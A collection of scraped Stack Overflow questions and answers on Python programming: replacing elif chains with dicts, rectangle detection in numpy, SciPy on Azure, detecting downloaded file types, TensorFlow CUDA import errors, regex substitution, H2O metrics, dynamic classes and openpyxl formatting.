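Regarding the "why" at the end of the answer above: <code>Series.apply</code> maps the function element-wise and stores whatever it returns — here a nested list — as a single object per row, whereas <code>DataFrame.apply(..., axis=1)</code> may try to align a list-like return value with the frame's columns, which is one way a shape mismatch like the one in the traceback can arise. A toy sketch with a stand-in tokenizer (no NLTK required):

```python
import pandas as pd

def fake_sent_word_tokenize(text):
    # stand-in for the NLTK-based sent_word_tokenize in the question
    return [sent.split() for sent in text.split(". ")]

df = pd.DataFrame({"text": ["good morning. nice day", "hello there"]})

# Series.apply: one object (a nested list) per row, no shape inference
df["text_tokenized"] = df["text"].apply(fake_sent_word_tokenize)
print(df["text_tokenized"][0])  # [['good', 'morning'], ['nice', 'day']]
```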
How to reduce elif statement use?
38,710,085
<p>If I'm making a program that allows you to translate words, is there a way to not use elif every time and just write words to translate? This is what I've got now!</p> <pre><code>print("English to Exrian Dictionary")
search = input("Enter the word you would like to translate: ").lower()
if search == "ant":
    print("Ulf")
elif search == "back":
    print("Zuwp")
elif search == "ban":
    print("Zul")
elif search == "bat":
    print("Zuf")
elif search == "bye":
    print("Zio")
elif search == "wumohu":
    print("Camera")
elif search == "car":
    print("Wuh")
elif search == "carrot":
    print("Wuhhef")
elif search == "cat":
    print("Wuf")
elif search == "doctor":
    print("vewfeh")
elif search == "dog":
    print("Ves")
elif search == "duck":
    print("Vawp")
elif search == "egg":
    print("Oss")
elif search == "enter":
    print("Olfoh")
elif search == "experiment":
    print("Oxkohymolf")
elif search == "fat":
    print("Tuf")
elif search == "flower":
    print("Tnecoh")
elif search == "goal":
    print("Seun")
elif search == "goat":
    print("Seuf")
elif search == "hand":
    print("Rulv")
elif search == "hat":
    print("Ruf")
elif search == "hello":
    print("Ronne")
elif search == "hello":
    print("Ronne")
elif search == "house":
    print("Reago")
elif search == "hello":
    print("Ronne")
elif search == "information":
    print("Yltehmufyel")
elif search == "inspiration":
    print("Ylgkyhufyel")
elif search == "lawyer":
    print("Nucioh")
elif search == "no":
    print("Le")
elif search == "yes":
    print("Iog")
else:
    print("No results were found for '" + search + "'")
</code></pre>
0
2016-08-02T00:35:56Z
38,710,157
<p>Use a <code>dict</code> to map each input to the appropriate output.</p> <pre><code>print("English to Exrian Dictionary") d = {"ant": "Ulf", "back": "Zuwp", # etc } search = input("Enter the word you would like to translate: ").lower() if search in d: print(d[search]) else: print("No results were found for '" + search + "'") </code></pre>
2
2016-08-02T00:45:11Z
[ "python" ]
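A small variation on the answer above, assuming nothing beyond the builtin <code>dict</code>: <code>dict.get</code> takes a fallback value, which removes even the membership test around the lookup (only a few of the word pairs are reproduced here):

```python
translations = {"ant": "Ulf", "back": "Zuwp", "ban": "Zul", "yes": "Iog", "no": "Le"}

def translate(word):
    # get() returns its second argument when the key is missing
    return translations.get(word.lower(),
                            "No results were found for '" + word + "'")

print(translate("Ant"))    # Ulf
print(translate("zebra"))  # No results were found for 'zebra'
```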
How to reduce elif statement use?
38,710,085
<p>If I'm making a program that allows you to translate words, is there a way to not use elif every time and just write words to translate? This is what I've got now!</p> <pre><code>print("English to Exrian Dictionary")
search = input("Enter the word you would like to translate: ").lower()
if search == "ant":
    print("Ulf")
elif search == "back":
    print("Zuwp")
elif search == "ban":
    print("Zul")
elif search == "bat":
    print("Zuf")
elif search == "bye":
    print("Zio")
elif search == "wumohu":
    print("Camera")
elif search == "car":
    print("Wuh")
elif search == "carrot":
    print("Wuhhef")
elif search == "cat":
    print("Wuf")
elif search == "doctor":
    print("vewfeh")
elif search == "dog":
    print("Ves")
elif search == "duck":
    print("Vawp")
elif search == "egg":
    print("Oss")
elif search == "enter":
    print("Olfoh")
elif search == "experiment":
    print("Oxkohymolf")
elif search == "fat":
    print("Tuf")
elif search == "flower":
    print("Tnecoh")
elif search == "goal":
    print("Seun")
elif search == "goat":
    print("Seuf")
elif search == "hand":
    print("Rulv")
elif search == "hat":
    print("Ruf")
elif search == "hello":
    print("Ronne")
elif search == "hello":
    print("Ronne")
elif search == "house":
    print("Reago")
elif search == "hello":
    print("Ronne")
elif search == "information":
    print("Yltehmufyel")
elif search == "inspiration":
    print("Ylgkyhufyel")
elif search == "lawyer":
    print("Nucioh")
elif search == "no":
    print("Le")
elif search == "yes":
    print("Iog")
else:
    print("No results were found for '" + search + "'")
</code></pre>
0
2016-08-02T00:35:56Z
38,710,161
<p>This might help (using <code>input</code> and <code>print()</code> to match the Python 3 code in the question):</p> <pre><code>def translate(item):
    try:
        return {
            'ant': "Ulf",
            'back': "Zuwp",
            'ban': "Zul"
        }[item]  # etc
    except KeyError:
        return "No results were found for '" + item + "'"

print("English to Exrian Dictionary")
search = input("Enter the word you would like to translate: ").lower()
print(translate(search))
</code></pre>
0
2016-08-02T00:45:20Z
[ "python" ]
How to reduce elif statement use?
38,710,085
<p>If I'm making a program that allows you to translate words, is there a way to not use elif every time and just write words to translate? This is what I've got now!</p> <pre><code>print("English to Exrian Dictionary")
search = input("Enter the word you would like to translate: ").lower()
if search == "ant":
    print("Ulf")
elif search == "back":
    print("Zuwp")
elif search == "ban":
    print("Zul")
elif search == "bat":
    print("Zuf")
elif search == "bye":
    print("Zio")
elif search == "wumohu":
    print("Camera")
elif search == "car":
    print("Wuh")
elif search == "carrot":
    print("Wuhhef")
elif search == "cat":
    print("Wuf")
elif search == "doctor":
    print("vewfeh")
elif search == "dog":
    print("Ves")
elif search == "duck":
    print("Vawp")
elif search == "egg":
    print("Oss")
elif search == "enter":
    print("Olfoh")
elif search == "experiment":
    print("Oxkohymolf")
elif search == "fat":
    print("Tuf")
elif search == "flower":
    print("Tnecoh")
elif search == "goal":
    print("Seun")
elif search == "goat":
    print("Seuf")
elif search == "hand":
    print("Rulv")
elif search == "hat":
    print("Ruf")
elif search == "hello":
    print("Ronne")
elif search == "hello":
    print("Ronne")
elif search == "house":
    print("Reago")
elif search == "hello":
    print("Ronne")
elif search == "information":
    print("Yltehmufyel")
elif search == "inspiration":
    print("Ylgkyhufyel")
elif search == "lawyer":
    print("Nucioh")
elif search == "no":
    print("Le")
elif search == "yes":
    print("Iog")
else:
    print("No results were found for '" + search + "'")
</code></pre>
0
2016-08-02T00:35:56Z
38,710,163
<p>You can just use a <code>dict</code> object. </p> <p>Example:</p> <pre><code>words = {'ant': 'Ulf', 'back': 'Zuwp', 'ban' : 'Zul'} # etc try: print(words[search]) except KeyError as e: print("No results were found for '" + search + "'") </code></pre>
0
2016-08-02T00:45:26Z
[ "python" ]
How to compare (x,y) points in array to extract rectangular shape in python
38,710,103
<p>I have a numpy array that was extracted from an image running the harris corner detection algorithm from opencv and I am trying to sort out four points that resembles a rectangle.</p> <p>The following is the set of points:</p> <pre><code>numpy.array([[194, 438], [495, 431], [512, 519], [490, 311], [548, 28], [407, 194], [181, 698], [169, 93], [408, 99], [221, 251], [395, 692], [574, 424], [431, 785], [538, 249], [397, 615], [306, 237]]) </code></pre> <p>What would be the best method to compare the points for angles in quadrants within a slight deviation of 90 along with comparing how parallel lines between top and bottom points and left and right points are to return the four best possible candidates?</p> <p><strong>Edit</strong></p> <p>The image is roughly aligned with the rectangle so there is no significant rotation or distortion. The deviation allowance for perspective transformation and rough capturing I think can be +/- 10 degrees</p> <p>Below is an image of the plotted lines with x and y locations. The desired corners are top-left (169,93), top-right (408,99), bottom-right (395,692), and bottom-left (181,698) <a href="http://i.stack.imgur.com/iKhCV.png" rel="nofollow"><img src="http://i.stack.imgur.com/iKhCV.png" alt="enter image description here"></a></p>
3
2016-08-02T00:37:47Z
38,754,407
<p>This is probably not the most efficient way to go about finding the corners but I split the points into four quadrants like so:</p> <pre><code>yThreshM = height / 2 xThreshM = width / 2 tl = dst[ ((dst[:,1]&lt;yThreshM) &amp; (dst[:,0]&lt;xThreshM)) ] tr = dst[ ((dst[:,1]&lt;yThreshM) &amp; (dst[:,0]&gt;xThreshM)) ] br = dst[ ((dst[:,1]&gt;yThreshM) &amp; (dst[:,0]&gt;xThreshM)) ] bl = dst[ ((dst[:,1]&gt;yThreshM) &amp; (dst[:,0]&lt;xThreshM)) ] </code></pre> <p>Then I grouped each section into their respective angles for the top left and the bottom right:</p> <pre><code>tla = [bl, tl, tr] bra = [tr, br, bl] tlap = list(it.product(*tla)) brap = list(it.product(*bra)) </code></pre> <p>Then I calculated the direction of the vertical lines and removed items not within a given perpendicular threshold. Then I calculated the angles and filtered out the items not within a threshold +/- of 90 degrees.</p> <p>Lastly, I checked that the opposite end points of the results of iterating through <code>tlap</code> and <code>brap</code> matched to get the rest of the points and to verify the <code>tl</code> and <code>br</code> points.</p>
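As a rough, dependency-free illustration of the quadrant split described above (my sketch with toy coordinates taken from the question's plot; the real code uses numpy boolean indexing on dst):

```python
# Split candidate corner points into four quadrants around the image centre.
# Toy data only: five of the question's points, with assumed image size.
points = [(169, 93), (408, 99), (395, 692), (181, 698), (306, 237)]
width, height = 600, 800
x_mid, y_mid = width / 2, height / 2

tl = [p for p in points if p[0] < x_mid and p[1] < y_mid]   # top-left
tr = [p for p in points if p[0] >= x_mid and p[1] < y_mid]  # top-right
br = [p for p in points if p[0] >= x_mid and p[1] >= y_mid] # bottom-right
bl = [p for p in points if p[0] < x_mid and p[1] >= y_mid]  # bottom-left
```

Each quadrant then yields a small candidate set over which the angle and parallelism checks can iterate.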
0
2016-08-03T22:05:00Z
[ "python", "opencv", "numpy", "scipy" ]
How to install SciPy on an Azure C# webapp?
38,710,158
<p>I have a website built with .Net Core 1.0 (C#) and deployed it to Azure WebApp (32 bit mode).</p> <p>The app uses some python scripts and I was able to create a virtual env (3.4.1) and successfully installed numpy (1.11.0) with <code>pip install numpy</code>. </p> <p>The problem I'm facing is that I can not install SciPy. Trying <code>pip install scipy</code> fails because of compiler issues which I understand. </p> <p>Next try was to download Christoph Gohlke's Python Extension Packages for Windows (<a href="http://www.lfd.uci.edu/~gohlke/pythonlibs/#scipy" rel="nofollow">from here</a>), copied it to my web app and tried to run 'pip install scipy-0.18.0-cp34-cp34m-win32.whl' without success. The error I get is:</p> <pre><code>scipy-0.18.0-cp34-cp34m-win32.whl is not a supported wheel on this platform. Storing debug log for failure in D:\home\pip\pip.log </code></pre> <p>pip.log contains the following:</p> <pre><code>scipy-0.18.0-cp34-cp34m-win32.whl is not a supported wheel on this platform. Exception information: Traceback (most recent call last): File "D:\home\site\wwwroot\env\lib\site-packages\pip\basecommand.py", line 122, in main status = self.run(options, args) File "D:\home\site\wwwroot\env\lib\site-packages\pip\commands\install.py", line 257, in run InstallRequirement.from_line(name, None)) File "D:\home\site\wwwroot\env\lib\site-packages\pip\req.py", line 167, in from_line raise UnsupportedWheel("%s is not a supported wheel on this platform." % wheel.filename) pip.exceptions.UnsupportedWheel: scipy-0.18.0-cp34-cp34m-win32.whl is not a supported wheel on this platform. </code></pre> <p>I have tried to create a requirement.txt file as stated in <a href="https://azure.microsoft.com/en-us/documentation/articles/web-sites-python-configure/#troubleshooting---package-installation" rel="nofollow">Troubleshooting - Package Installation</a>. 
However, since it's not a Python app but a .NET Core C# app, it doesn't seem to care about the requirement.txt file, and I don't see anything about it in the deploy.cmd file.</p>
1
2016-08-02T00:45:16Z
38,716,606
<p>@mdeblois, your understanding is correct; please see the official explanation below.</p> <blockquote> <p>Some packages may not install using pip when run on Azure. It may simply be that the package is not available on the Python Package Index. It could be that a compiler is required (a compiler is not available on the machine running the web app in Azure App Service).</p> </blockquote> <p>For this case, you can refer to the section <a href="https://azure.microsoft.com/en-us/documentation/articles/web-sites-python-configure/#troubleshooting---package-installation" rel="nofollow">Troubleshooting - Package Installation</a> of the official tutorial to learn how to deal with this.</p>
1
2016-08-02T09:27:03Z
[ "python", "azure", "scipy", "azure-web-app-service" ]
Python - Download file over HTTP and detect filetype automatically
38,710,238
<p>I want download a file via HTTP, but all the examples online involve fetching the data and then putting it in a local file. The problem with this is that you need to explicitly set the filetype of the local file.</p> <p>I want to download a file but I won't know the filetype of what I'm downloading.</p> <p>This is what I currently have:</p> <pre><code>urllib.urlretrieve(fetch_url,output.csv) </code></pre> <p>But if I download, say a XML file it will be CSV. Is there anyway to get python to detect the file that I get sent from a URL like: <a href="http://asassaassa.com/assaas?abc=123" rel="nofollow">http://asassaassa.com/assaas?abc=123</a> </p> <p>Say the above URL gives me an XML I want python to detect that.</p>
0
2016-08-02T00:56:47Z
38,710,582
<p>You can use <a href="https://github.com/ahupp/python-magic" rel="nofollow">python-magic</a> to detect file type. It can be installed via "pip install python-magic". </p> <p>I assume you are using Python 2.7 since you are calling urlretrieve. The example is geared to 2.7, but it is easily adapted.</p> <p>This is a working example:</p> <pre><code>import mimetypes # Detects mimetype import magic # Uses magic numbers to detect file type, and does so much better than the built in mimetypes import urllib # Your library import os # for renaming your file mime = magic.Magic(mime=True) output = "output" # Your file name without extension urllib.urlretrieve("https://docs.python.org/3.0/library/mimetypes.html", output) # This is just an example url mimes = mime.from_file(output) # Get mime type ext = mimetypes.guess_all_extensions(mimes)[0] # Guess extension os.rename(output, output+ext) # Rename file </code></pre>
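If installing python-magic is not an option, a stdlib-only fallback (my sketch, assuming the file is fetched over HTTP) is to map the server's Content-Type response header to an extension with mimetypes:

```python
# Hypothetical helper: the HTTP response usually carries a Content-Type
# header; the stdlib mimetypes module can map that to a file extension.
import mimetypes

def extension_from_content_type(content_type):
    # Strip any "; charset=..." parameters before guessing.
    mime = content_type.split(";")[0].strip()
    return mimetypes.guess_extension(mime) or ""

print(extension_from_content_type("application/json; charset=utf-8"))
```

This only works when the server sends an accurate Content-Type; the magic-number approach above is more robust for misconfigured servers.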
1
2016-08-02T01:44:16Z
[ "python", "http" ]
'Library not loaded: @rpath/libcudart.7.5.dylib' TensorFlow Error on Mac
38,710,339
<p>I'm using OS X El Capitan (10.11.4).</p> <p>I just downloaded TensorFlow using the pip install instructions <a href="https://www.tensorflow.org/versions/r0.10/get_started/os_setup.html">here</a>.</p> <p>Everything went pretty smoothly, though I did get a few warning messages like:</p> <p><code>The directory '/Users/myusername/Library/Caches/pip/http' or its parent directory is not owned by the current user and the cache has been disabled. Please check the permissions and owner of that directory. If executing pip with sudo, you may want the -H flag.</code></p> <p>and</p> <p><code>You are using pip version 6.0.8, however version 8.1.2 is available.</code> Even though I just installed pip.</p> <p>Then, when I tested TensorFlow in Python, I got the error:</p> <pre><code>&gt;&gt;&gt; import tensorflow as tf Traceback (most recent call last): File "&lt;stdin&gt;", line 1, in &lt;module&gt; File "/Library/Frameworks/Python.framework/Versions/3.4/lib/python3.4/site-packages/tensorflow/__init__.py", line 23, in &lt;module&gt; from tensorflow.python import * File "/Library/Frameworks/Python.framework/Versions/3.4/lib/python3.4/site-packages/tensorflow/python/__init__.py", line 48, in &lt;module&gt; from tensorflow.python import pywrap_tensorflow File "/Library/Frameworks/Python.framework/Versions/3.4/lib/python3.4/site-packages/tensorflow/python/pywrap_tensorflow.py", line 28, in &lt;module&gt; _pywrap_tensorflow = swig_import_helper() File "/Library/Frameworks/Python.framework/Versions/3.4/lib/python3.4/site-packages/tensorflow/python/pywrap_tensorflow.py", line 24, in swig_import_helper _mod = imp.load_module('_pywrap_tensorflow', fp, pathname, description) File "/Library/Frameworks/Python.framework/Versions/3.4/lib/python3.4/imp.py", line 243, in load_module return load_dynamic(name, filename, file) ImportError: dlopen(/Library/Frameworks/Python.framework/Versions/3.4/lib/python3.4/site-packages/tensorflow/python/_pywrap_tensorflow.so, 10): Library not loaded: 
@rpath/libcudart.7.5.dylib Referenced from: /Library/Frameworks/Python.framework/Versions/3.4/lib/python3.4/site-packages/tensorflow/python/_pywrap_tensorflow.so Reason: image not found </code></pre> <p>Now, when I try to do <code>pip uninstall tensorflow-0.10.0rc0</code> it tells me that it's not installed.</p> <p>The closest thing I've found to resembling this problem is <a href="https://github.com/tensorflow/tensorflow/issues/2278">this issue</a> in the TensorFlow GitHub docs (which I have not tried).</p> <p>How can I uninstall whatever it did install and get TensorFlow up and running correctly?</p>
6
2016-08-02T01:12:01Z
38,712,022
<p>This error message is displayed if you install the GPU-enabled Mac OS version of TensorFlow (available from release 0.10 onwards) on a machine that does not have CUDA installed.</p> <p>To fix the error, install the CPU version for Python 2.7 or 3.x, as follows:</p> <pre><code># Mac OS X, CPU only, Python 2.7: $ export TF_BINARY_URL=https://storage.googleapis.com/tensorflow/mac/cpu/tensorflow-0.10.0rc0-py2-none-any.whl $ sudo pip install --upgrade $TF_BINARY_URL # Mac OS X, CPU only, Python 3.4 or 3.5: $ export TF_BINARY_URL=https://storage.googleapis.com/tensorflow/mac/cpu/tensorflow-0.10.0rc0-py3-none-any.whl $ sudo pip3 install --upgrade $TF_BINARY_URL </code></pre>
10
2016-08-02T04:55:05Z
[ "python", "osx", "pip", "tensorflow", "osx-elcapitan" ]
'Library not loaded: @rpath/libcudart.7.5.dylib' TensorFlow Error on Mac
38,710,339
<p>I'm using OS X El Capitan (10.11.4).</p> <p>I just downloaded TensorFlow using the pip install instructions <a href="https://www.tensorflow.org/versions/r0.10/get_started/os_setup.html">here</a>.</p> <p>Everything went pretty smoothly, though I did get a few warning messages like:</p> <p><code>The directory '/Users/myusername/Library/Caches/pip/http' or its parent directory is not owned by the current user and the cache has been disabled. Please check the permissions and owner of that directory. If executing pip with sudo, you may want the -H flag.</code></p> <p>and</p> <p><code>You are using pip version 6.0.8, however version 8.1.2 is available.</code> Even though I just installed pip.</p> <p>Then, when I tested TensorFlow in Python, I got the error:</p> <pre><code>&gt;&gt;&gt; import tensorflow as tf Traceback (most recent call last): File "&lt;stdin&gt;", line 1, in &lt;module&gt; File "/Library/Frameworks/Python.framework/Versions/3.4/lib/python3.4/site-packages/tensorflow/__init__.py", line 23, in &lt;module&gt; from tensorflow.python import * File "/Library/Frameworks/Python.framework/Versions/3.4/lib/python3.4/site-packages/tensorflow/python/__init__.py", line 48, in &lt;module&gt; from tensorflow.python import pywrap_tensorflow File "/Library/Frameworks/Python.framework/Versions/3.4/lib/python3.4/site-packages/tensorflow/python/pywrap_tensorflow.py", line 28, in &lt;module&gt; _pywrap_tensorflow = swig_import_helper() File "/Library/Frameworks/Python.framework/Versions/3.4/lib/python3.4/site-packages/tensorflow/python/pywrap_tensorflow.py", line 24, in swig_import_helper _mod = imp.load_module('_pywrap_tensorflow', fp, pathname, description) File "/Library/Frameworks/Python.framework/Versions/3.4/lib/python3.4/imp.py", line 243, in load_module return load_dynamic(name, filename, file) ImportError: dlopen(/Library/Frameworks/Python.framework/Versions/3.4/lib/python3.4/site-packages/tensorflow/python/_pywrap_tensorflow.so, 10): Library not loaded: 
@rpath/libcudart.7.5.dylib Referenced from: /Library/Frameworks/Python.framework/Versions/3.4/lib/python3.4/site-packages/tensorflow/python/_pywrap_tensorflow.so Reason: image not found </code></pre> <p>Now, when I try to do <code>pip uninstall tensorflow-0.10.0rc0</code> it tells me that it's not installed.</p> <p>The closest thing I've found to resembling this problem is <a href="https://github.com/tensorflow/tensorflow/issues/2278">this issue</a> in the TensorFlow GitHub docs (which I have not tried).</p> <p>How can I uninstall whatever it did install and get TensorFlow up and running correctly?</p>
6
2016-08-02T01:12:01Z
38,829,274
<p>To add to <a href="http://stackoverflow.com/a/38712022/169275">@mrry's answer</a>, if you already have CUDA installed but you still get the error, it could be because the CUDA libraries are not on your path. Add the following to your ~/.bashrc or ~/.zshrc:</p> <pre><code># export CUDA_HOME=/Developer/NVIDIA/CUDA-7.5 ## This is the default location on macOS export CUDA_HOME=/usr/local/cuda export DYLD_LIBRARY_PATH="$CUDA_HOME/lib:$DYLD_LIBRARY_PATH" export PATH="$CUDA_HOME/bin:$PATH" </code></pre> <p>Uncomment either of the <code>CUDA_HOME</code>s or edit it so that it contains your CUDA install. If you do not know where it is installed, try:</p> <pre><code>find / -name "*libcudart*" </code></pre>
1
2016-08-08T12:29:59Z
[ "python", "osx", "pip", "tensorflow", "osx-elcapitan" ]
Replace specific named group with re.sub in python
38,710,363
<p>I create a regular expression to find urls like <code>/places/:state/:city/whatever</code></p> <pre><code>p = re.compile('^/places/(?P&lt;state&gt;[^/]+)/(?P&lt;city&gt;[^/]+).*$') </code></pre> <p>This works just fine:</p> <pre><code>import re p = re.compile('^/places/(?P&lt;state&gt;[^/]+)/(?P&lt;city&gt;[^/]+).*$') path = '/places/NY/NY/other/stuff' match = p.match(path) print match.groupdict() </code></pre> <p>Prints <code>{'city': 'NY', 'state': 'NY'}</code>.</p> <p>How can I process a logfile to replace <code>/places/NY/NY/other/stuff</code> with the string <code>"/places/:state/:city/other/stuff"</code>? I'd like to get a sense of how many urls are of the "cities-type" without caring that the places are (<code>NY</code>, <code>NY</code>) specifically.</p> <p>The simple approach can fail:</p> <pre><code>import re p = re.compile('^/places/(?P&lt;state&gt;[^/]+)/(?P&lt;city&gt;[^/]+).*$') path = '/places/NY/NY/other/stuff' match = p.match(path) if match: groupdict = match.groupdict() for k, v in sorted(groupdict.items()): path = path.replace(v, ':' + k, 1) print path </code></pre> <p>Will print <code>/places/:city/:state/other/stuff</code>, which is backwards!</p> <p>Feels like there should be some way to use <code>re.sub</code> but I can't see it.</p>
0
2016-08-02T01:15:46Z
38,727,823
<p>Figured out a better way to do this. There is a property <code>groupindex</code> on a compiled regular expression which prints the groups <em>and their orders</em> in the pattern string:</p> <pre><code>&gt;&gt;&gt; p = re.compile('^/places/(?P&lt;state&gt;[^/]+)/(?P&lt;city&gt;[^/]+).*$') &gt;&gt;&gt; p.groupindex {'city': 2, 'state': 1} </code></pre> <p>Which can easily be iterated in the correct order:</p> <pre><code>&gt;&gt;&gt; sorted(p.groupindex.items(), key=lambda x: x[1]) [('state', 1), ('city', 2)] </code></pre> <p>Using this, I should be able to guarantee that I replace matches in their correct left-to-right order:</p> <pre><code>p = re.compile('^/places/(?P&lt;state&gt;[^/]+)/(?P&lt;city&gt;[^/]+).*$') path = '/places/NY/NY/other/stuff' match = p.match(path) if match: groupdict = match.groupdict() for k, _ in sorted(p.groupindex.items(), key=lambda x: x[1]): path = path.replace(groupdict[k], ':' + k, 1) print path </code></pre> <p>This loops over the groups in the correct order, which ensures that the replacement also occurs in the correct order, reliably resulting in the correct string:</p> <pre><code>/places/:state/:city/other/stuff </code></pre>
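For what it's worth (my own sketch, not part of the answer above), the re.sub route the question hoped for also works: sub replaces the entire matched span in one pass, so the left-to-right ordering problem never arises. The pattern below drops the trailing .*$ so that only the prefix is rewritten.

```python
import re

# Named groups are kept for documentation, though the replacement string
# here doesn't actually need to reference them.
p = re.compile(r'^/places/(?P<state>[^/]+)/(?P<city>[^/]+)')

def normalize(path):
    # Non-matching paths come back unchanged.
    return p.sub('/places/:state/:city', path)

print(normalize('/places/NY/NY/other/stuff'))  # /places/:state/:city/other/stuff
```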
0
2016-08-02T18:20:22Z
[ "python", "regex", "string-substitution" ]
How do I get the accuracy/precision of a h2o model?
38,710,377
<p>I'm trying to get the accuracy of my multiclass classifier using logistic regression. Is there any way to get the accuracy with a built-in function or do I have to write the function myself?</p> <p>Below is my code so far:</p> <pre><code>multinomial_fit = H2OGeneralizedLinearEstimator(family="multinomial",max_iterations=100) multinomial_fit.train(x=train_h2o_cro.columns[1:],y=train_h2o_cro.columns[0],training_frame=train_h2o) prediction_glm_h2o = multinomial_fit.predict(test_h2o) multinomial_fit.model_performance(test_h2o) </code></pre> <p>With the last line of code, I only get the MSE and nothing else.</p> <p>Thanks in advance.</p>
2
2016-08-02T01:18:36Z
38,724,825
<p>you can use <code>multinomial_fit.logloss()</code>, here's an example using the iris dataset:</p> <pre><code>import h2o from h2o.estimators.glm import H2OGeneralizedLinearEstimator h2o.init() iris_df = h2o.import_file("https://s3.amazonaws.com/h2o-public-test-data/smalldata/iris/iris.csv") predictors = iris_df.columns[0:4] response_col = "C5" train,valid,test = iris_df.split_frame([.7,.15], seed =1234) glm_model = H2OGeneralizedLinearEstimator(family="multinomial") glm_model.train(predictors, response_col, training_frame = train, validation_frame = valid) print(glm_model.logloss(train = True)) print(glm_model.logloss(valid = True)) </code></pre>
0
2016-08-02T15:34:47Z
[ "python", "machine-learning", "classification", "h2o" ]
How do I get the accuracy/precision of a h2o model?
38,710,377
<p>I'm trying to get the accuracy of my multiclass classifier using logistic regression. Is there any way to get the accuracy with a built-in function or do I have to write the function myself?</p> <p>Below is my code so far:</p> <pre><code>multinomial_fit = H2OGeneralizedLinearEstimator(family="multinomial",max_iterations=100) multinomial_fit.train(x=train_h2o_cro.columns[1:],y=train_h2o_cro.columns[0],training_frame=train_h2o) prediction_glm_h2o = multinomial_fit.predict(test_h2o) multinomial_fit.model_performance(test_h2o) </code></pre> <p>With the last line of code, I only get the MSE and nothing else.</p> <p>Thanks in advance.</p>
2
2016-08-02T01:18:36Z
38,759,512
<p>This is currently unimplemented, but it makes sense to add this. Here is the <a href="https://0xdata.atlassian.net/browse/PUBDEV-3202" rel="nofollow">JIRA ticket</a> where you can track the progress.</p>
2
2016-08-04T06:00:14Z
[ "python", "machine-learning", "classification", "h2o" ]
How to dynamically create a class in Python with an initializer
38,710,388
<p>Here is some code to start with:</p> <pre><code>def objectify(name, fields): """ Create a new object including the __init__() method. """ def __init__(self, *argv): for name, val in zip(var_names, argv): setattr(self, name, val) # The following line of code is currently limited to a single dynamic class. # We would like to extend it to allow creating multiple classes # and each class should remember its own fields. __init__.var_names = fields result = type(name, (object,), dict(__init__=__init__)) </code></pre> <p>The challenge here is to find a way to make unique copies of the <code>__init__()</code> method of each class which has a static list of its variable names.</p> <p>Plan B: We can do this using <code>eval()</code> to run code that a function generates. But <code>eval()</code> is to be avoided wherever possible. The challenge here is to do this without <code>eval()</code>.</p> <p>EDIT: While writing up the question I came up with a solution. (See below.) Maybe this will help someone.</p> <p>EDIT2: I would use this function to create something like a <code>namedtuple()</code>, except that they are mutable.</p> <pre><code>Point = objectify('point', ['x', 'y']) a = Point(1, 2) b = Point(2, 3) print a.__dict__ print b.__dict__ </code></pre>
0
2016-08-02T01:20:28Z
38,710,389
<p>Here is one solution:</p> <pre><code>def objectify(obj_name, fields): """ Create a new object including the __init__() method. """ def __init__(self, *argv): """ Generic initializer for dynamically created classes. """ fields = objectify.fields[self.__class__.__name__] for field, val in zip(fields, argv): setattr(self, field, val) result = type(obj_name, (object,), dict()) result.__init__ = __init__ # Save the list of fields in a static dictionary that is retrieved by class name. objectify.fields[obj_name] = fields return result objectify.fields = {} # A static local variable. </code></pre>
0
2016-08-02T01:20:28Z
[ "python" ]
How to dynamically create a class in Python with an initializer
38,710,388
<p>Here is some code to start with:</p> <pre><code>def objectify(name, fields): """ Create a new object including the __init__() method. """ def __init__(self, *argv): for name, val in zip(var_names, argv): setattr(self, name, val) # The following line of code is currently limited to a single dynamic class. # We would like to extend it to allow creating multiple classes # and each class should remember its own fields. __init__.var_names = fields result = type(name, (object,), dict(__init__=__init__)) </code></pre> <p>The challenge here is to find a way to make unique copies of the <code>__init__()</code> method of each class which has a static list of its variable names.</p> <p>Plan B: We can do this using <code>eval()</code> to run code that a function generates. But <code>eval()</code> is to be avoided wherever possible. The challenge here is to do this without <code>eval()</code>.</p> <p>EDIT: While writing up the question I came up with a solution. (See below.) Maybe this will help someone.</p> <p>EDIT2: I would use this function to create something like a <code>namedtuple()</code>, except that they are mutable.</p> <pre><code>Point = objectify('point', ['x', 'y']) a = Point(1, 2) b = Point(2, 3) print a.__dict__ print b.__dict__ </code></pre>
0
2016-08-02T01:20:28Z
38,710,501
<p>You don't mention anything about the usage of fields later on. If you only need them in <code>__init__</code>, you don't need to save them at all:</p> <pre><code>def objectify(name, fields): """ Create a new object including the __init__() method. """ fields = fields[:] def __init__(self, *argv): for name, val in zip(fields, argv): setattr(self, name, val) result = type(name, (object,), dict(__init__=__init__)) return result </code></pre> <p>Otherwise, you should look at metaclasses - that's exactly the use case for them.</p> <p>Updated: making a copy of <code>fields</code> ensures that changing the list in the caller will not affect the stored one. The values can still change... left as an exercise to the reader to verify everything is a <code>str</code>.</p>
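A quick self-contained sanity check (mine, not the answerer's) that this closure-based version gives each generated class its own independent field list:

```python
# Python 3 rendering of the closure approach above: each call to objectify
# captures its own copy of fields, so two classes never share state.
def objectify(name, fields):
    fields = fields[:]
    def __init__(self, *argv):
        for field, val in zip(fields, argv):
            setattr(self, field, val)
    return type(name, (object,), dict(__init__=__init__))

Point = objectify('Point', ['x', 'y'])
Size = objectify('Size', ['w', 'h'])
a = Point(1, 2)
s = Size(3, 4)
print(a.x, a.y, s.w, s.h)  # 1 2 3 4
```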
3
2016-08-02T01:34:05Z
[ "python" ]
How to exclude blank cell in conditional formatting in openpyxl?
38,710,450
<p>I am using conditional formatting in openpyxl but got stumped trying to exclude blank cells. I have a column with numbers which I format using CellIsRule. The code I use is below.</p> <pre><code>ws2.conditional_formatting.add('C3:C25',CellIsRule(operator='lessThan', formula=['85'], stopIfTrue=True, fill=redFill,font=whiteText)) ws2.conditional_formatting.add('C3:C25',CellIsRule(operator='greaterThan', formula=['89.99'], stopIfTrue=True, fill=greenFill)) ws2.conditional_formatting.add('C3:C25',CellIsRule(operator='between', formula=['85', '89.99'], stopIfTrue=True, fill=yellowFill)) </code></pre> <p>I tried to use FormulaRule but had no idea what to use for the formula.</p> <p>Update:</p> <p>Instead of using conditional formatting, using a for loop worked. </p> <pre><code>for row in ws2.iter_rows("C3:C25"): for cell in row: if cell.value == None: set_stylewhite(cell) elif cell.value &gt;= 90: set_stylegreen(cell) elif cell.value &lt;= 85: set_stylered(cell) else: set_styleyellow(cell) </code></pre>
0
2016-08-02T01:27:47Z
38,743,351
